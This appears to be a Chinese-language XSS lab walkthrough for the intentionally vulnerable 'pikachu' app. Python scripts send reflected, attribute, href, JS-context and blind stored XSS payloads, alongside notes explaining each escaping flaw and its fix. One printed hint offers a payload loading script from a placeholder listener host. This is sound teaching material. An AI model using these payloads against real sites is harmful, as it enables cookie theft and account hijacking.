xss之盲打
#盲打的意思就是,你注入的内容不会在前台回显,只有当管理员在后台打开(触发)它的时候才会执行;所以在前台响应里找不到 payload 并不代表注入失败,必须到后台查看,或使用带外回调(让 payload 去请求你控制的地址)来验证。
过滤
htmlspecialchars
#htmlspecialchars() 没有加 ENT_QUOTES 时(PHP 8.1 之前的默认行为)只转义双引号,单引号 ' 不被转义;当输出点位于单引号包裹的属性值里时,就可以用 ' 闭合属性并插入 onclick 等事件处理器。修复:htmlspecialchars($s, ENT_QUOTES, 'UTF-8')。
href
#href 输出:即使做了 HTML 实体转义,只要没有校验 URL 协议(scheme),javascript: 中不含任何需要转义的字符,会原样进入 href,用户点击即执行代码;修复应在服务端用白名单只允许 http/https。
js
#JS 输出:用户输入被直接拼进 <script> 里的字符串字面量而没有做 JS 转义,用 ' 闭合字符串后就能执行任意代码;注意 htmlspecialchars 对 JS 上下文无效,应改用 JSON 编码(json_encode)或 JS 专用转义输出。
#盲打的意思就是,你注入的内容不会在前台回显,只有当管理员在后台打开(触发)它的时候才会执行;所以在前台响应里找不到 payload 并不代表注入失败,必须到后台查看,或使用带外回调(让 payload 去请求你控制的地址)来验证。
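import requests

# Blind (stored) XSS, pikachu xss_blind: the comment is stored and only rendered
# when an administrator opens the backend, so the payload is not expected to
# appear in this response at all.
url = "http://192.168.8.1/pikachu-master/vul/xss/xssblind/xss_blind.php"
payload = "<script>alert(document.cookie)</script>"
# timeout: never let an unreachable target hang the script indefinitely.
resp = requests.post(url, data={"content": payload, "name": "name"}, timeout=10)
print("[+] 注入完成! ")
# `payload in resp.text` says nothing here: a blind XSS endpoint does not echo
# the stored content back, so that check reads False even when the injection
# worked. Report that the submission was accepted and say where to verify.
print("[+] 提交状态码: ", resp.status_code)
print(
    "[+] 盲打无法在前台验证: 请登录后台查看该留言是否触发弹窗,"
    "或改用带外回调 payload(如 <script src=\"http://<你的监听地址>/x.js\"></script>)并观察监听器是否收到请求。"
)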
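import requests

# Reflected XSS, pikachu xss_01: `message` is echoed back in the page; success
# means the exact payload comes back untouched.
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_01.php"
payload = "<Script>alert(1)</Script>"
# timeout: never let an unreachable target hang the script indefinitely.
resp = requests.get(url, params={"message": payload, "submit": "submit"}, timeout=10)
print("[+] 完成注入")
# Match the whole payload rather than just "<Script>": a partial match could be
# satisfied by a filter that kept the opening tag but mangled the rest.
print("[+] 查看是否注入成功: ", payload in resp.text)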
#htmlspecialchars() 没有加 ENT_QUOTES 时(PHP 8.1 之前的默认行为)只转义双引号,单引号 ' 不被转义;当输出点位于单引号包裹的属性值里时,就可以用 ' 闭合属性并插入 onclick 等事件处理器。修复:htmlspecialchars($s, ENT_QUOTES, 'UTF-8')。
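import requests

# pikachu xss_02: the single quote is left unescaped, so the payload closes the
# surrounding attribute value and adds an onclick handler. The payload only
# fires when the element is clicked, hence the hint printed at the end.
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_02.php"
payload = "' onclick='alert(1)'"
# timeout: never let an unreachable target hang the script indefinitely.
resp = requests.get(url, params={"message": payload, "submit": "submit"}, timeout=10)
print("[+] 注入完成")
# Success == the payload is reflected verbatim, i.e. the ' survived encoding.
print("[+] 查看是否注入成功: ", payload in resp.text)
print("点击一下页面,弹出弹框")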
#href 输出:即使做了 HTML 实体转义,只要没有校验 URL 协议(scheme),javascript: 中不含任何需要转义的字符,会原样进入 href,用户点击即执行代码;修复应在服务端用白名单只允许 http/https。
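from urllib.parse import urlencode

import requests

# pikachu xss_03: `message` lands in an href. A javascript: URL contains none of
# the characters HTML entity encoding touches, so it survives unless the server
# validates the URL scheme.
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_03.php"
payload = "javascript:alert(1);"
params = {"message": payload, "submit": "submit"}
# timeout: never let an unreachable target hang the script indefinitely.
resp = requests.get(url, params=params, timeout=10)
print("[+] 注入完成")
print("[+] 查看注入是否成功:", payload in resp.text)
print("[+] 点击页面的链接")
# Build the clickable link with proper percent-encoding instead of raw string
# concatenation, so a payload containing '&', '#' or spaces is not split or
# truncated by the browser; also send the same `submit` field the form does.
print(f"[+] 或者点击:{url}?{urlencode(params)}")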
#JS 输出:用户输入被直接拼进 <script> 里的字符串字面量而没有做 JS 转义,用 ' 闭合字符串后就能执行任意代码;注意 htmlspecialchars 对 JS 上下文无效,应改用 JSON 编码(json_encode)或 JS 专用转义输出。
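import requests

# pikachu xss_04: `message` is inserted into a single-quoted JS string inside a
# <script> block. The payload closes that string, runs alert(1), and comments
# out the remainder of the original statement so the script still parses.
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_04.php"
payload = "';alert(1);//"
# timeout: never let an unreachable target hang the script indefinitely.
resp = requests.get(url, params={"message": payload, "submit": "submit"}, timeout=10)
print("[+] 注入完成")
# Look for the full payload rather than the bare word "alert": that word may
# already occur in the page's own scripts or hints and give a false positive.
print("[+] 查看是否注入成功: ", payload in resp.text)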